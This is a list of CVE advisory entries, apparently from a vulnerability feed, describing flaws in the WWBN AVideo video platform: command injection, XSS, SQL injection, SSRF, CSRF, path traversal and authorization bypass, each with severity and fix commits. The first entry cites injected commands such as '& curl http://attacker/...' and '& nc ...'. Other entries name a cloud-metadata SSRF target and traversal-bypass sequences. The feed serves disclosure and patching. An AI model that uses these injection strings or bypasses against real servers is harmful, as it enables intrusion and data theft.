CVE-2026-55173 8.1 high 3.0% no CPE yet WWBN AVideo is an open source video platform. Versions 29.0 and below remain vulnerable to OS command injection because the fix for CVE-2026-33482 was incomplete and still does not neutralize a single & ( the shell background operator). CVE-2026-33482 reported that sanitizeFFmpegCommand() (plugin/API/standAlone/functions.php) failed to strip $(...) command substitution, allowing OS command injection at the execAsync() sh -c sink. The fix (commit 25c8ab90) added $, (, ), {, }, \n, \r to the denylist character class and a str_replace('&&', '', ...), but did not account for the single &. ffmpeg.json.php builds the command from _decryptString(getInput('codeToExecEncrypted')). This is the same threat model the original advisory accepted (“an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server”) and the same CVSS basis (AV:N/AC:H/PR:N). Multiple &-separated commands can be chained (e.g. download + execute). Redirect-based payloads are blocked by the > strip, but command execution (e.g. & curl http://attacker/..., & nc ..., dropping/running a file) is not. This issue has been patched by this commit: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f. Sat 24 Oct
CVE-2026-41304 8.9 high 2.0% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and below, the `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection. An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to Remote Code Execution (RCE) on the server. Commit 473c609fc2defdea8b937b00e86ce88eba1f15bb contains a fix. Mon 26 Oct
CVE-2026-40911 10.0 critical 1.0% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and prior, the YPTSocket plugin's WebSocket server relays attacker-supplied JSON message bodies to every connected client without sanitizing the `msg` or `callback` fields. On the client side, `plugin/YPTSocket/script.js` contains two `eval()` sinks fed directly by those relayed fields (`json.msg.autoEvalCodeOnHTML` at line 568 and `json.callback` at line 95). Because tokens are minted for anonymous visitors and never revalidated beyond decryption, an unauthenticated attacker can broadcast arbitrary JavaScript that executes in the origin of every currently-connected user (including administrators), resulting in universal account takeover, session theft, and privileged action execution. Commit c08694bf6264eb4decceb78c711baee2609b4efd contains a fix. Mon 26 Oct
CVE-2026-33767 7.1 high 1.0% wwbn, avideo WWBN AVideo is an open source video platform. In versions up to and including 26.0, in `objects/like.php`, the `getLike()` method constructs a SQL query using a prepared statement placeholder (`?`) for `users_id` but directly concatenates `$this->videos_id` into the query string without parameterization. An attacker who can control the `videos_id` value (via a crafted request) can inject arbitrary SQL, bypassing the partial prepared-statement protection. Commit 0215d3c4f1ee748b8880254967b51784b8ac4080 contains a patch. Mon 26 Oct
CVE-2026-33770 7.1 high 1.0% wwbn, avideo WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `fixCleanTitle()` static method in `objects/category.php` constructs a SQL SELECT query by directly interpolating both `$clean_title` and `$id` into the query string without using prepared statements or parameterized queries. An attacker who can trigger category creation or renaming with a crafted title value can inject arbitrary SQL. Commit 994cc2b3d802b819e07e6088338e8bf4e484aae4 contains a patch. Mon 26 Oct
CVE-2026-116800 6.9 medium 1.0% no CPE yet WWBN AVideo before 29.5.0 contains a local file inclusion vulnerability that allows unauthenticated attackers to include PHP files outside the locale directory via a crafted Accept-Language header. Attackers can use overlapping traversal sequences like ....// to bypass single-pass removal in setLanguage(), executing existing server-side PHP files in the application context. Tue 27 Oct
CVE-2026-41062 6.5 medium 1.0% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and below, the directory traversal fix introduced in commit 2375eb5e0 for `objects/aVideoEncoderReceiveImage.json.php` only checks the URL path component (via `parse_url($url, PHP_URL_PATH)`) for `..` sequences. However, the downstream function `try_get_contents_from_local()` in `objects/functionsFile.php` uses `explode('/videos/', $url)` on the **full URL string** including the query string. An attacker can place the `/videos/../../` traversal payload in the query string to bypass the security check and read arbitrary files from the server filesystem. Commit bd11c16ec894698e54e2cdae25026c61ad1ed441 contains an updated fix. Mon 26 Oct
CVE-2026-40909 6.5 medium 1.0% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and prior, the locale save endpoint (`locale/save.php`) constructs a file path by directly concatenating `$_POST['flag']` into the path at line 30 without any sanitization. The `$_POST['code']` parameter is then written verbatim to that path via `fwrite()` at line 40. An admin attacker (or any user who can CSRF an admin, since no CSRF token is checked and cookies use `SameSite=None`) can traverse out of the `locale/` directory and write arbitrary `.php` files to any writable location on the filesystem, achieving Remote Code Execution. Commit 57f89ffbc27d37c9d9dd727212334846e78ac21a fixes the issue. Mon 26 Oct
CVE-2026-54458 9.6 critical 0.00% no CPE yet WWBN AVideo is an open source video platform. Versions prior to 29.0 contain a stored DOM Cross-Site Scripting vulnerability in the YPTSocket plugin. Any unauthenticated remote attacker can execute arbitrary JavaScript in the authenticated origin of every administrator currently viewing a page that renders the YPTSocket online-users debug panel. plugin/YPTSocket/getWebSocket.json.php issues a signed WebSocket token to any anonymous caller, and MessageSQLiteV2::onOpen at plugin/YPTSocket/MessageSQLiteV2.php lines 91 and 110 reads the attacker-controlled webSocketSelfURI and page_title query parameters from the WebSocket connection URL with no validation. Both values persist into the in-memory SQLite connections table and broadcast inside the users_id_online array sent to every connected client; on the client, plugin/YPTSocket/script.js::updateSocketUserCard interpolates the broadcast page_title into an HTML template literal that is passed to jQuery $.append(html), which parses attacker bytes into live DOM nodes including <img> with inline event handlers. Successful attackers can can read non-HttpOnly cookies and the CSRF token rendered into the admin dashboard, issue authenticated requests to any admin-only endpoint, exfiltrate the admin dashboard DOM, and chain into any admin-context mutation. When the victim is an AVideo administrator, the attacker turns a single anonymous WebSocket connection into full administrative takeover via the admin's own session. This issue has been patched by https://github.com/WWBN/AVideo/commit/8be71e53ccbe9b84b30870db386fb4d2b11e1c16. Sat 24 Oct
CVE-2026-41064 9.3 critical 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions up to and including 29.0, an incomplete fix for AVideo's `test.php` adds `escapeshellarg` for wget but leaves the `file_get_contents` and `curl` code paths unsanitized, and the URL validation regex `/^http/` accepts strings like `httpevil[.]com`. Commit 78bccae74634ead68aa6528d631c9ec4fd7aa536 contains an updated fix. Mon 26 Oct
CVE-2026-33867 9.1 critical 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions up to and including 26.0, AVideo allows content owners to password-protect individual videos. The video password is stored in the database in plaintext — no hashing, salting, or encryption is applied. If an attacker gains read access to the database (via SQL injection, a database backup, or misconfigured access controls), they obtain all video passwords in cleartext. Commit f2d68d2adbf73588ea61be2b781d93120a819e36 contains a patch. Mon 26 Oct
CVE-2026-34374 9.1 critical 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `Live_schedule::keyExists()` method constructs a SQL query by interpolating a stream key directly into the query string without parameterization. This method is called as a fallback from `LiveTransmition::keyExists()` when the initial parameterized lookup returns no results. Although the calling function correctly uses parameterized queries for its own lookup, the fallback path to `Live_schedule::keyExists()` undoes this protection entirely. This vulnerability is distinct from GHSA-pvw4-p2jm-chjm, which covers SQL injection via the `live_schedule_id` parameter in the reminder function. This finding targets the stream key lookup path used during RTMP publish authentication. As of time of publication, no patched versions are available. Mon 26 Oct
CVE-2026-59256 8.7 high 0.00% no CPE yet WWBN AVideo through commit 9c39d8c8 contains an authorization bypass vulnerability where getToken() creates tokens without binding to user identity or purpose, and plugin/Gallery/view/sections.php issues valid tokens to unauthenticated visitors. Attackers can retrieve a token from the Gallery endpoint and use it to bypass authorization checks in other subsystems like view/hls.php to access restricted video content. 12 Oct
CVE-2026-40925 8.3 high 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and prior, `objects/configurationUpdate.json.php` (also routed via `/updateConfig`) persists dozens of global site settings from `$_POST` but protects the endpoint only with `User::isAdmin()`. It does not call `forbidIfIsUntrustedRequest()`, does not verify a `globalToken`, and does not validate the Origin/Referer header. Because AVideo intentionally sets `session.cookie_samesite=None` to support cross-origin iframe embedding, a logged-in administrator who visits an attacker-controlled page will have the browser auto-submit a cross-origin POST that rewrites the site's encoder URL, SMTP credentials, site `<head>` HTML, logo, favicon, contact email, and more in a single request. Commit f9492f5e6123dff0292d5bb3164fde7665dc36b4 contains a fix. Mon 26 Oct
CVE-2026-34375 8.2 high 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions up to and including 26.0, the YPTWallet Stripe payment confirmation page directly echoes the `$_REQUEST['plugin']` parameter into a JavaScript block without any encoding or sanitization. The `plugin` parameter is not included in any of the framework's input filter lists defined in `security.php`, so it passes through completely raw. An attacker can inject arbitrary JavaScript by crafting a malicious URL and sending it to a victim user. The same script block also outputs the current user's username and password hash via `User::getUserName()` and `User::getUserPass()`, meaning a successful XSS exploitation can immediately exfiltrate these credentials. Commit fa0bc102493a15d79fe03f86c07ab7ca1b5b63e2 fixes the issue. Mon 26 Oct
CVE-2026-41056 8.1 high 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and below, the `allowOrigin($allowAll=true)` function in `objects/functions.php` reflects any arbitrary `Origin` header back in `Access-Control-Allow-Origin` along with `Access-Control-Allow-Credentials: true`. This function is called by both `plugin/API/get.json.php` and `plugin/API/set.json.php` — the primary API endpoints that handle user data retrieval, authentication, livestream credentials, and state-changing operations. Combined with the application's `SameSite=None` session cookie policy, any website can make credentialed cross-origin requests and read authenticated API responses, enabling theft of user PII, livestream keys, and performing state changes on behalf of the victim. Commit caf705f38eae0ccfac4c3af1587781355d24495e contains a fix. Mon 26 Oct
CVE-2026-41058 8.1 high 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and below, the incomplete fix for AVideo's CloneSite `deleteDump` parameter does not apply path traversal filtering, allowing `unlink()` of arbitrary files via `../../` sequences in the GET parameter. Commit 3c729717c26f160014a5c86b0b6accdbd613e7b2 contains an updated fix. Mon 26 Oct
CVE-2026-43884 7.7 high 0.00% no CPE yet WWBN AVideo is an open source video platform. In versions up to and including 29.0, two endpoints (plugin/AI/receiveAsync.json.php and objects/EpgParser.php) in AVideo call isSSRFSafeURL() to validate user-supplied URLs, then fetch them using bare file_get_contents() without disabling PHP's automatic redirect following. An attacker can supply a URL pointing to a server they control that returns a 302 redirect to an internal/cloud-metadata address (e.g., http://169.254.169.254/latest/meta-data/). Since isSSRFSafeURL() only validates the initial URL, the redirect target bypasses all SSRF protections. Commit 603e7bf77a835584387327e35560262feb075db3 contains an updated fix. Mon 26 Oct
CVE-2026-43885 7.7 high 0.00% no CPE yet WWBN AVideo is an open source video platform. In versions up to and including 29.0, an unauthenticated user can read APISecret from objects/plugins.json.php and use it to call protected API endpoints (e.g. users_list) without logging in. Commit 1c36f229d0a103528fb9f64d0a1cc0e1e8f5999b contains an updated fix. Mon 26 Oct
CVE-2026-49279 7.7 high 0.00% no CPE yet WWBN AVideo is an open source video platform. Versions 29.0 and below contain a Stored XSS vulnerability through the autoEvalCodeOnHTML parameter in the MessageSQLite WebSocket Handler. The MessageSQLite.php handler only strips autoEvalCodeOnHTML from $json['msg'], but msgToResourceId() reads from $msg['json'] with higher priority. An attacker can place the XSS payload in the json key instead of msg, bypassing the sanitization entirely. An authenticated attacker can execute arbitrary JavaScript in any connected user's browser session via the WebSocket messaging system, stealing session cookies and authentication tokens, taking over accounts through session hijacking, and chaining with CSRF to perform admin actions on the victim's behalf, in the default SQLite WebSocket backend configuration. This issue has a patch that has yet to be officially released, see https://github.com/WWBN/AVideo/commit/3e0b3ce2bfa766183ff0ae227439394db57b1a23. Sat 24 Oct
CVE-2026-43873 7.5 high 0.00% no CPE yet WWBN AVideo is an open source video platform. In versions up to and including 29.0, plugin/CloneSite/cloneClient.json.php echoes the local CloneSite shared secret ($objClone->myKey, a constant md5($global['systemRootPath'] . $global['salt'])) into the HTTP response body on every unauthenticated request. The unauthenticated error branch was intended to reject non-admin callers without a valid key, but the rejection message interpolates the expected key before die(). When the victim has CloneSite configured with a remote cloneSiteURL (standard federation/backup setup), the leaked myKey is exactly the credential that authenticates the victim to that remote server's cloneServer.json.php, allowing the attacker to impersonate the victim and trigger a full mysqldump of the remote's database to the remote's public videos/clones/ directory Commit e6566f56a28f4556b2a0a09d03717a719dcb49da contains an updated fix. Mon 26 Oct
CVE-2026-33692 7.5 high 0.00% no CPE yet WWBN AVideo is an open source video platform. Versions prior to 29.0 expose .env files to unauthenticated users through the official Docker compose configuration. The official docker-compose.yml mounts the entire project root directory as the Apache document root, causing the .env file — which contains database credentials, admin passwords, and infrastructure configuration — to be served as a static file at /.env. No .htaccess rule or Apache configuration blocks access to dotfiles. Exploitation enables direct database access, admin panel takeover, and further lateral movement within the Docker network. This issue has been resolved in version 29.0. Sat 24 Oct
CVE-2026-43874 7.2 high 0.00% no CPE yet WWBN AVideo is an open source video platform. In versions up to and including 29.0, the server-side mitigation for the YPTSocket autoEvalCodeOnHTML eval sink (from CVE-2026-40911) only strips the payload when it sits under $json['msg'], but the relay function msgToResourceId() selects the outbound message from $msg['json'] before $msg['msg']. An unauthenticated attacker can obtain a WebSocket token from plugin/YPTSocket/getWebSocket.json.php, connect to the WebSocket server, and send a message with autoEvalCodeOnHTML nested under a top-level json field — the strip branch is skipped, the relay delivers the payload verbatim to any logged-in user identified by to_users_id, and the client script runs it through eval(). Commit 9f3006f9a89a34daa67a83c6ad35f450cb91fcce contains an updated fix. Mon 26 Oct
CVE-2026-40926 7.1 high 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and prior, three admin-only JSON endpoints — `objects/categoryAddNew.json.php`, `objects/categoryDelete.json.php`, and `objects/pluginRunUpdateScript.json.php` — enforce only a role check (`Category::canCreateCategory()` / `User::isAdmin()`) and perform state-changing actions against the database without calling `isGlobalTokenValid()` or `forbidIfIsUntrustedRequest()`. Peer endpoints in the same directory (`pluginSwitch.json.php`, `pluginRunDatabaseScript.json.php`) do enforce the CSRF token, so the missing checks are an omission rather than a design choice. An attacker who lures a logged-in admin to a malicious page can create, update, or delete categories and force execution of any installed plugin's `updateScript()` method in the admin's session. Commit ee5615153c40628ab3ec6fe04962d1f92e67d3e2 contains a fix. Mon 26 Oct
CVE-2026-41057 7.1 high 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and below, the CORS origin validation fix in commit `986e64aad` is incomplete. Two separate code paths still reflect arbitrary `Origin` headers with credentials allowed for all `/api/*` endpoints: (1) `plugin/API/router.php` lines 4-8 unconditionally reflect any origin before application code runs, and (2) `allowOrigin(true)` called by `get.json.php` and `set.json.php` reflects any origin with `Access-Control-Allow-Credentials: true`. An attacker can make cross-origin credentialed requests to any API endpoint and read authenticated responses containing user PII, email, admin status, and session-sensitive data. Commit 5e2b897ccac61eb6daca2dee4a6be3c4c2d93e13 contains a fix. Mon 26 Oct
CVE-2026-58002 7.1 high 0.00% no CPE yet WWBN AVideo through commit 9c39d8c8b4c1f75540788d6b391740852ceb0732 contains an authorization bypass vulnerability in the Users_affiliations add.json.php endpoint that allows authenticated users to forge two-party consent records by supplying the counterparty's agreement timestamp. Attackers can create a forged affiliation with status='a' and then reassign video ownership to arbitrary users through the videoAddNew.json.php endpoint, which trusts the forged affiliation as an authorization term. 12 Oct
CVE-2026-58003 7.1 high 0.00% no CPE yet WWBN AVideo through commit 9c39d8c8 contains a cross-site request forgery vulnerability in the releaseVideoNow.json.php endpoint that lacks authenticity checks and accepts GET requests. Attackers can craft a malicious cross-site GET request carrying an administrator's session cookie to permanently publish any embargoed video by manipulating the videos_id parameter. 12 Oct
CVE-2026-114633 7.0 high 0.00% no CPE yet WWBN AVideo before 29.4.0 contains an incorrect authorization vulnerability that allows delegated Users Admin accounts to delete or modify administrator accounts. Attackers can submit requests to confirmDeleteUser.json.php or userAddNew.json.php targeting administrators to delete their videos and accounts, or change and demote them. 14 h ago
CVE-2026-58001 6.9 medium 0.00% no CPE yet WWBN AVideo through commit 9c39d8c8 contains a cross-site request forgery vulnerability in objects/videoEditLight.php that lacks request authenticity checks and accepts GET requests. Attackers can store an img tag in a video description that transfers video ownership to an attacker-controlled account when an administrator views the video page. 12 Oct
CVE-2026-43875 6.8 medium 0.00% no CPE yet WWBN AVideo is an open source video platform. In versions up to and including 29.0, plugin/MobileManager/oauth2.php completes an OAuth login by sending an HTTP 302 Location: oauth2Success.php?user=<email>&pass=<HASH> where <HASH> is the victim's stored password hash (md5(hash("whirlpool", sha1(password)))) read directly from the users table. AVideo's own login endpoint (objects/login.json.php) accepts an encodedPass=1 flag that bypasses hashing and performs a direct string comparison between the supplied value and the stored hash. Anyone who captures the redirect URL — via server logs, referrer leakage, or browser history — therefore obtains a credential equivalent to the plaintext password and can fully take over the account, including admin accounts. Commit 977cd6930a97571a26da4239e25c8096dd4ecbc1 contains an updated fix. Mon 26 Oct
CVE-2026-40907 6.5 medium 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and prior, the endpoint `plugin/Live/view/Live_restreams/list.json.php` contains an Insecure Direct Object Reference (IDOR) vulnerability that allows any authenticated user with streaming permission to retrieve other users' live restream configurations, including third-party platform stream keys and OAuth tokens (access_token, refresh_token) for services like YouTube Live, Facebook Live, and Twitch. Commit d5992fff2811df4adad1d9fc7d0a5837b882aed7 fixes the issue. Mon 26 Oct
CVE-2026-41060 6.5 medium 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and below, the `isSSRFSafeURL()` function in `objects/functions.php` contains a same-domain shortcircuit (lines 4290-4296) that allows any URL whose hostname matches `webSiteRootURL` to bypass all SSRF protections. Because the check compares only the hostname and ignores the port, an attacker can reach arbitrary ports on the AVideo server by using the site's public hostname with a non-standard port. The response body is saved to a web-accessible path, enabling full exfiltration. Commit a0156a6398362086390d949190f9d52a823000ba fixes the issue. Mon 26 Oct
CVE-2026-33731 6.5 medium 0.00% no CPE yet WWBN AVideo is an open source video platform. In versions prior to 29.0, the Authorize.Net webhook handler at plugin/AuthorizeNet/webhook.php contains a signature verification bypass that allows an attacker to forge webhook requests with arbitrary payment amounts and target user IDs. By supplying a valid transaction ID from a small legitimate purchase, the attacker bypasses signature validation and credits arbitrary wallet balances to any user account via attacker-controlled payload fields. Three flaws combine into an exploit chain: signature bypass via OR logic (webhook.php:33), payload values override API-fetched values (AuthorizeNet.php:169-171, webhook.php:44-48) and a missing approval check (webhook.php:61-75). By forging payment metadata, an attacker can credit arbitrary amounts to any user's wallet without a corresponding payment and include a plans_id to activate premium subscriptions (webhook.php:86-134), enabling free access to all paid and premium content and causing direct revenue loss to the platform owner. This issue has been fixed in version 29.0. Sat 24 Oct
CVE-2026-43876 6.4 medium 0.00% no CPE yet WWBN AVideo is an open source video platform. In versions up to and including 29.0, objects/notifySubscribers.json.php takes the raw message POST parameter and passes it into sendSiteEmail(), which substitutes it directly into an HTML email template (via str_replace on the {message} placeholder) and renders it with PHPMailer::msgHTML(). There is no HTML sanitization, character escaping, or output encoding on the attacker-controlled message between $_POST['message'] and the rendered email. Any authenticated user with upload permission can therefore broadcast arbitrary HTML — phishing links, tracking pixels, CSS/UI spoofing — to every subscriber on their channel (up to 10,000 recipients per invocation). The email is sent From: the platform's configured contact address and wrapped in the site's official logo and title, so attacker-supplied HTML arrives with the appearance of an official platform communication. Commit https://github.com/WWBN/AVideo/commit/ contains an updated fix. Mon 26 Oct
CVE-2026-34245 6.3 medium 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `plugin/PlayLists/View/Playlists_schedules/add.json.php` endpoint allows any authenticated user with streaming permission to create or modify broadcast schedules targeting any playlist on the platform, regardless of ownership. When the schedule executes, the rebroadcast runs under the victim playlist owner's identity, allowing content hijacking and stream disruption. Commit 1e6dc20172de986f60641eb4fdb4090f079ffdce contains a patch. Mon 26 Oct
CVE-2026-43878 6.1 medium 0.00% no CPE yet WWBN AVideo is an open source video platform. In versions up to and including 29.0, plugin/Meet/iframe.php echoes the attacker-controlled user and pass query parameters unescaped into a JavaScript double-quoted string literal inside a <script> block. An attacker who sends a victim to a crafted URL can break out of the string and execute arbitrary JavaScript in the victim's browser in the context of the AVideo origin. No authentication is required if a public Meet schedule exists on the target. Commit 3298ced2bcf92e4f3acff6ce9bde14edf42ecb5b contains an updated fix. Mon 26 Oct
CVE-2026-50182 6.1 medium 0.00% no CPE yet WWBN AVideo is an open source video platform. Versions prior to 29.0 contain an unauthenticated Reflected XSS vulnerability through AVideo YouTubeAPI Gallery Pagination. The $_GET['search'] query parameter is concatenated directly into the href attribute of two pagination links in plugin/YouTubeAPI/gallerySection.php (lines 67 and 74) with no htmlspecialchars, no urlencode, and no allow-list check. An injected <script> element is then extracted by the AVideo Layout plugin and concatenated into a single trailing inline script block at the bottom of the page, where the browser executes it. Any unauthenticated attacker can lure a victim into following a crafted URL to execute arbitrary JavaScript under the AVideo origin, which can read non-HttpOnly cookies and issue authenticated AJAX requests as the victim, and when the victim is an administrator, it can perform any cookie-authenticated admin action (create user, promote to admin, change configuration, install plugin), escalating a single click into full administrative takeover. This issue has been patched by this commit: https://github.com/WWBN/AVideo/commit/f50fc033b7adb36f1ffd6640e7826468bdafdec3. Sat 24 Oct
CVE-2026-34362 5.4 medium 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `verifyTokenSocket()` function in `plugin/YPTSocket/functions.php` has its token timeout validation commented out, causing WebSocket tokens to never expire despite being generated with a 12-hour timeout. This allows captured or legitimately obtained tokens to provide permanent WebSocket access, even after user accounts are deleted, banned, or demoted from admin. Admin tokens grant access to real-time connection data for all online users including IP addresses, browser info, and page locations. Commit 5d5237121bf82c24e9e0fdd5bc1699f1157783c5 fixes the issue. CVE-2026-40929 5.4 medium 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and prior, `objects/commentDelete.json.php` is a state-mutating JSON endpoint that deletes comments but performs no CSRF validation. It does not call `forbidIfIsUntrustedRequest()`, does not verify a CSRF/global token, and does not check `Origin`/`Referer`. Because AVideo intentionally sets `session.cookie_samesite=None` (to support cross-origin embed players), a cross-site request from any attacker-controlled page automatically carries the victim's `PHPSESSID`. Any authenticated victim who has authority to delete one or more comments (site moderators, video owners, and comment authors) can be tricked into deleting comments en masse simply by visiting an attacker page. Commit 184f36b1896f3364f864f17c1acca3dd8df3af27 contains a fix. Mon 26 Oct
CVE-2026-34247 5.4 medium 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `plugin/Live/uploadPoster.php` endpoint allows any authenticated user to overwrite the poster image for any scheduled live stream by supplying an arbitrary `live_schedule_id`. The endpoint only checks `User::isLogged()` but never verifies that the authenticated user owns the targeted schedule. After overwriting the poster, the endpoint broadcasts a `socketLiveOFFCallback` notification containing the victim's broadcast key and user ID to all connected WebSocket clients. Commit 5fcb3bdf59f26d65e203cfbc8a685356ba300b60 fixes the issue. Mon 26 Oct
CVE-2026-40928 5.4 medium 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and prior, multiple AVideo JSON endpoints under `objects/` accept state-changing requests via `$_REQUEST`/`$_GET` and persist changes tied to the caller's session user, without any anti-CSRF token, origin check, or referer check. A malicious page visited by a logged-in victim can silently cast/flip the victim's like/dislike on any comment (`objects/comments_like.json.php`), post a comment authored by the victim on any video, with attacker-chosen text (`objects/commentAddNew.json.php`), and/or delete assets from any category (`objects/categoryDeleteAssets.json.php`) when the victim has category management rights. Each endpoint is reachable from a browser via a simple `<img src="…">` tag or form submission, so exploitation only requires the victim to load an attacker-controlled HTML resource. Commit 7aaad601bd9cd7b993ba0ee1b1bea6c32ee7b77c contains a fix. Mon 26 Oct
CVE-2026-41061 5.4 medium 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and below, the `isValidDuration()` regex at `objects/video.php:918` uses `/^[0-9]{1,2}:[0-9]{1,2}:[0-9]{1,2}/` without a `$` end anchor, allowing arbitrary HTML/JavaScript to be appended after a valid duration prefix. The crafted duration is stored in the database and rendered without HTML escaping via `echo Video::getCleanDuration()` on trending pages, playlist pages, and video gallery thumbnails, resulting in stored cross-site scripting. Commit bcba324644df8b4ed1f891462455f1cd26822a45 contains a fix. Mon 26 Oct
CVE-2026-41063 5.4 medium 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and below, an incomplete XSS fix in AVideo's `ParsedownSafeWithLinks` class overrides `inlineMarkup` for raw HTML but does not override `inlineLink()` or `inlineUrlTag()`, allowing `javascript:` URLs in markdown link syntax to bypass sanitization. Commit cae8f0dadbdd962c89b91d0095c76edb8aadcacf contains an updated fix. Mon 26 Oct
CVE-2026-43877 5.4 medium 0.00% no CPE yet WWBN AVideo is an open source video platform. In versions up to and including 29.0, objects/userSavePhoto.php is a legacy profile-photo endpoint that accepts a base64 POST parameter and writes the decoded bytes to videos/userPhoto/photo<users_id>.png. Its only access control is User::isLogged(). It does not end in .json.php, so it is excluded from the project's global autoCSRFGuard (which is suffix-scoped in objects/include_config.php). There is no CSRF token, no Origin/Referer check, and no MIME validation of the decoded bytes. Because AVideo's default cookie policy is SameSite=None; Secure on HTTPS (objects/functionsPHP.php:227), an attacker who lures a logged-in user to a malicious page can overwrite that user's profile photo with arbitrary bytes and also triggers a site-wide clearCache(true) on every forged request. Commit 9c38468041505e637101c5943c5370c68f48e3ac contains an updated fix. Mon 26 Oct
CVE-2026-43879 5.4 medium 0.00% no CPE yet WWBN AVideo is an open source video platform. In versions up to and including 29.0, an authenticated user can configure their own donation-notification webhook URL to point at internal/loopback/metadata hosts (e.g. http://127.0.0.1:8080/..., http://169.254.169.254/latest/..., RFC1918 addresses). When any other user (including a second account owned by the same attacker) donates even a trivial amount via plugin/CustomizeUser/donate.json.php, the AVideo server issues a curl POST to the attacker-supplied URL, resulting in a blind SSRF. The handler uses only isValidURL() (which is a format check) and does not call the codebase's own isSSRFSafeURL() helper. Additionally, CURLOPT_FOLLOWLOCATION is enabled with no per-hop revalidation, so even if the stored URL were validated, an HTTP 307 from an attacker-controlled host could redirect the POST to internal targets. Commit aaacd48f29f1ff71d1eb5fc81d37605f593cefa9 contains an updated fix. Mon 26 Oct
CVE-2026-33759 5.3 medium 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `objects/playlistsVideos.json.php` endpoint returns the full video contents of any playlist by ID without any authentication or authorization check. Private playlists (including `watch_later` and `favorite` types) are correctly hidden from listing endpoints via `playlistsFromUser.json.php`, but their contents are directly accessible through this endpoint by providing the sequential integer `playlists_id` parameter. Commit bb716fbece656c9fe39784f11e4e822b5867f1ca has a patch for the issue. Mon 26 Oct
CVE-2026-33761 5.3 medium 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions up to and including 26.0, three `list.json.php` endpoints in the Scheduler plugin lack any authentication check, while every other endpoint in the same plugin directories (`add.json.php`, `delete.json.php`, `index.php`) requires `User::isAdmin()`. An unauthenticated attacker can retrieve all scheduled tasks (including internal callback URLs and parameters), admin-composed email messages, and user-to-email targeting mappings by sending simple GET requests. Commit 83390ab1fa8dca2de3f8fa76116a126428405431 contains a patch. Mon 26 Oct
CVE-2026-34368 5.3 medium 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `transferBalance()` method in `plugin/YPTWallet/YPTWallet.php` contains a Time-of-Check-Time-of-Use (TOCTOU) race condition. The method reads the sender's wallet balance, checks sufficiency in PHP, then writes the new balance — all without database transactions or row-level locking. An attacker with multiple authenticated sessions can send concurrent transfer requests that all read the same stale balance, each passing the balance check independently, resulting in only one deduction being applied while the recipient is credited multiple times. Commit 34132ad5159784bfc7ba0d7634bb5c79b769202d contains a fix. Mon 26 Oct
CVE-2026-34369 5.3 medium 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `get_api_video_file` and `get_api_video` API endpoints in AVideo return full video playback sources (direct MP4 URLs, HLS manifests) for password-protected videos without verifying the video password. While the normal web playback flow enforces password checks via the `CustomizeUser::getModeYouTube()` hook, this enforcement is completely absent from the API code path. An unauthenticated attacker can retrieve direct playback URLs for any password-protected video by calling the API directly. Commit be344206f2f461c034ad2f1c5d8212dd8a52b8c7 fixes the issue. Mon 26 Oct
CVE-2026-40935 5.3 medium 0.00% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and prior, `objects/getCaptcha.php` accepts the CAPTCHA length (`ql`) directly from the query string with no clamping or sanitization, letting any unauthenticated client force the server to generate a 1-character CAPTCHA word. Combined with a case-insensitive `strcasecmp` comparison over a ~33-character alphabet and the fact that failed validations do NOT consume the stored session token, an attacker can trivially brute-force the CAPTCHA on any endpoint that relies on `Captcha::validation()` (user registration, password recovery, contact form, etc.) in at most ~33 requests per session. Commit bf1c76989e6a9054be4f0eb009d68f0f2464b453 contains a fix. Mon 26 Oct
